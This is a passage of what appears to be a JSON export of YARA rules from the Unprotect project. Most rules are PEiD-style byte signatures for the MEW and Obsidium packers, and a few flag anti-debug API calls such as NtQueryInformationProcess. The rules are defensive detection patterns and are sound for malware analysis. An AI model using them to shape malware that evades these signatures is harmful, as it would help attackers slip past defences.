62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PseudoSigner_02_MEW_11_SE_10: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_v10_Eng_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? ?? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v12_NorthfoxHCC_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_11_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 0C ?? ?? ?? 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_11_SE_v12_Eng_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_10_packer_v10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_10_by_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v11_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_MEW_11_SE_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_11_SE_v12_Eng_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 06 1E 52 B8 ?? ?? 1E CD 21 86 E0 3D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v12_NorthfoxHCC: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_MEW_11_SE_10: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_MEW_11_SE_10: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_5_10_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 48 01 ?? ?? ?? ?? ?? 95 A5 33 C0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v12_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD FF FF FF 38 E8 E3 FF FF FF 66 E8 0D 00 00 00 04 E8 E3 FF FF FF 70 E8 CB FF FF FF 69 E8 DD FF FF FF 58 E8 DD FF FF FF 69 E8 E3 FF FF FF 79 E8 BF FF FF FF 69 83 C4 40 E8 00 00 00 00 5D 81 ED 9D 11 40 00 8D 95 B4 11 40 00 E8 CB 2E 00 00 33 C0 F7 F0 69 8D B5 05 12 40 00 B9 5D 2E 00 00 8B FE AC }\r\n        $b = { EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD FF FF FF 38 E8 E3 FF FF FF 66 E8 0D 00 00 00 04 E8 E3 FF FF FF 70 E8 CB FF FF FF 69 E8 DD FF FF FF 58 E8 DD FF FF FF 69 E8 E3 FF FF FF 79 E8 BF FF FF FF 69 83 C4 40 E8 00 00 00 00 5D 81 ED 9D 11 40 00 8D 95 B4 11 40 00 E8 CB 2E 00 00 33 C0 F7 F0 69 8D B5 05 12 40 00 B9 5D 2E 00 00 8B FE AC }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MEW_5_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? AD 91 AD 93 53 AD 96 56 5F AC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_MEW_11_SE_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_MEW_11_SE_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v11_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 0C ?? ?? ?? 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 00 00 00 02 00 00 00 0C ?0 }\r\n        $b = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Mew_501_NorthFox_HCC_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 ?? 04 ?? C0 C8 ?? AA E2 F4 C3 00 ?? ?? 00 ?? ?? ?? 00 00 10 40 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_10_by_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_exe_coder_10_Northfox_HCC: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF 6A ?? ?? ?? ?? ?? 70 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_v10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v11_Northfox_HCC: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C }\r\n        $b = { E9 ?? ?? ?? FF 0C ?0 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MEW_11_SE_v12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_exe_coder_10_Northfox_HCC_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF 6A ?? ?? ?? ?? ?? 70 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 00 00 00 02 00 00 00 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_5_10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_v10_Eng_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? ?? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v11_Northfox_HCC_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 79,
            "key": "yara_detect_ntqueryinformationprocess",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_NtQueryInformationProcess",
            "rule": "rule Detect_NtQueryInformationProcess: AntiDebug {\r\n    meta: \r\n        description = \"Detect NtQueryInformationProcess as anti-debug\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"NtQueryInformationProcess\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and $1\r\n}"
        },
        {
            "id": 77,
            "key": "yara_detect_ntqueryobject",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_NtQueryObject",
            "rule": "rule Detect_NtQueryObject: AntiDebug {\r\n    meta: \r\n        description = \"Detect NtQueryObject as anti-debug\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"NtQueryObject\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and $1\r\n}"
        },
        {
            "id": 78,
            "key": "yara_detect_ntsetinformationthread",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_NtSetInformationThread",
            "rule": "rule Detect_NtSetInformationThread: AntiDebug {\r\n    meta: \r\n        description = \"Detect NtSetInformationThread as anti-debug\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"NtSetInformationThread\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and $1\r\n}"
        },
        {
            "id": 115,
            "key": "yara_detect_obsidium",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_Obsidium",
            "rule": "rule Obsidium_1337_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1350_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 02 ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 20 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 ?? ?? ?? ?? EB 01 ?? EB 02 ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8 }\r\n        $b = { EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 02 ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 20 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 04 ?? ?? ?? ?? 50 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v10061_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 AF 1C 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1337_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1364_Obsidium_Software_20090428: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? 50 EB 04 ?? ?? ?? ?? E8 29 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 1E EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 64 FF 30 EB 02 ?? ?? 64 89 20 EB 01 ?? EB 01 ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 ?? ?? ?? ?? EB 02 ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1338_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 01 ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 57 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1400_Obsidium_Software_20091005: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? E8 ?? 00 00 00 EB 01 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 71 49 EB 01 ?? EB 03 ?? ?? ?? 33 C0 EB 01 ?? 64 FF 30 EB 01 ?? 64 89 20 EB 02 ?? ?? EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? 58 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 ?? 00 00 00 EB 04 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 03 ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_10061_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 AF 1C 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1339_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 28 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 CF 27 00 00 }\r\n        $b = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 28 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1333_Obsidium_Software_SignByhaggar: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 2B 27 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1337_20070623_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8 F7 26 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v10059_Final_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 AB 1C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1250_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13017_Obsidium_software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 28 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1342_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13037_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1341_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2A 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 C3 27 00 00 }\r\n        $b = { EB 01 ?? E8 2A 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1258_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 7B 21 00 00 }\r\n        $b = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v1304_Obsidium_Software_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1258_V133X_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 EB 02 ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1258_V133X_Obsidium_Software_Sign_by_fly: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 EB 02 ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v13037_Obsidium_Software_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? 